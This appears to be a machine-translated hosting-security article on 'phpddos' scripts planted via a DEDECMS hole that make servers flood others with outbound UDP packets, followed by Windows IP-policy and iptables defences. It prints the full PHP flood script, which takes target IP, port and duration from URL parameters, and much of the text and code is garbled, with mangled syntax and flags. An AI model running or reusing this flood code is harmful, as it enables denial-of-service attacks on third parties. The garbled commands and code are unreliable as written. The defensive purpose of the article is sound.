There are a total of four security policies to prevent external packet sending on the server. Generally, you can use the first one. Some policies will prohibit Intranet and Internet access on the server!
Let's take a look at the code of phpddos packet distribution.
$ Packets = 0;
$ Ip = $ _ GET [ip];
$ Rand = $ _ GET [port];
Set_time_limit (0 );
Ignore_user_abort (FALSE );
$ Exec_time = $ _ GET [time];
$ Time = time ();
Print/"Flooded: $ ip on port $ rand
/";
$ Max_time = $ time + $ exec_time;
For ($ I = 0; I I <65535; $ I ++ ){
$ Out. =/"X /";
}
While (1 ){
$ Packets ++;
If (time ()> $ max_time ){
Break;
}
$ Fp = fsockopen (/"udp: // $ ip/", $ rand, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
Echo/"Packet complete at/". time (h: I: s/')./"
$ Packets (/". round ($ packets x 65)/1024, 2)./" mB) packets averaging /".
Round ($ packets/$ exec_time, 2)./"packets/s // n /";
?>
Characteristics
When IIS is enabled, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to others. This is different from the DDOS attack, where the server continuously receives a large number of packets.
This problem has recently occurred to a large number of servers due to the DEDECMS vulnerability.
How to quickly find these sites?
You can open the log
C:/Windows/System32/LogFiles/HTTPERR/httperr... log, open the file today,
There are records like this:
06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET/xxxx/xxxxxx. php? Host = 122.224.32.100 & port = 445 & time = 120 503 783 Disabled 30_FreeHost_1
Last three items 783 Disabled 30_FreeHost_1
783 is the ID in IIS
30_FreeHost_1 is the pool
Usage:
Reference content
Choose Start> Administrative Tools> Local Security Policy> IP Security Policy
"Operation" in the menu -- Import Policy
Set "external host management platform IPset"
Import and assign it. You can also modify it to add some ports you want to block.
External VM management platform IP policy 4.1 ---- This is used normally
Do not use it if you are not attacked-Disable all UDP ports and disable DNS2.0 ----- This is used in case of phpdos. Some attacks can be used to solve this problem.
Do not use the IP address that is not attacked-Disable all UDP ports, disable DNS, and collect port 80-this is used when phpdos is used. Some attacks can be used to solve the problem.
Do not use it if you are not attacked-prohibit external collection of port 80 --------- this is used only when a large number of users collect data externally and the bandwidth is affected.
Note: if an error similar to a failure to start the service is prompted when the storage policy is met, start the IPSEC Services Service in the service.
For linux users, the above method is obviously not feasible. We provide professional linux prevention methods
Iptables prevents php-ddos from sending packets externally
1. Allow ports (such as DNS) requiring UDP services)
Iptables-I OUTPUT-p udp -- dport 53-d 8.8.8.8-j ACCEPT
Ii. Prohibit the local machine from sending UDP packets externally
Iptables-a output-p udp-j DROP
The green "53" is the UDP port required by DNS, and the yellow "8.8.8.8" is the dns ip address, which is determined based on your server settings, if you do not know the dns ip address used by your server, you can run the following command in SSH to obtain it:
Cat/etc/resolv. conf | grep nameserver | awk 'nr = 1 {print $2 }'